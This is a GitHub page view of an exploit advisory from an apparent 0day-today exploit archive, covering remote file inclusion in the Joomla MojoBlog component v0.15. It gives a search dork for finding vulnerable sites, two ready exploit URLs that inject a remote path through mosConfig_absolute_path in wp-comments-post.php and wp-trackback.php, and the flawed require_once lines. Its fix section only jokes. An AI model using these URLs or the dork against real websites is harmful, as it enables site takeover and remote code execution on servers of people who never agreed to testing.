forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10056.txt
38 lines (22 loc) · 1.04 KB
/
10056.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Joomla MojoBlog Component v0.15 Multiple Remote File Include Vulnerabilities
============================================================================
[ Software Information ]
[+] Vendor : http://www.joomlify.com/
[+] Download : http://www.joomlify.com/files/mojoblog/
[+] version : RC0.15
[+] Vulnerability : RFI
[+] Dork : inurl:"com_mojo"
#########################################################################
[ Vulnerable File ]
http://server/components/com_mojo/wp-comments-post.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]
http://server/components/com_mojo/wp-trackback.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]
[ BUG IN ]
[1] wp-comments-post.php
[2] wp-trackback.php
======================
[1] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');
[2] require_once($mosConfig_absolute_path.'/components/com_mojo/wp-config.php');
[ FIX ]
contact me .. or aurakasih ..
Joke.. ;)
#########################################################################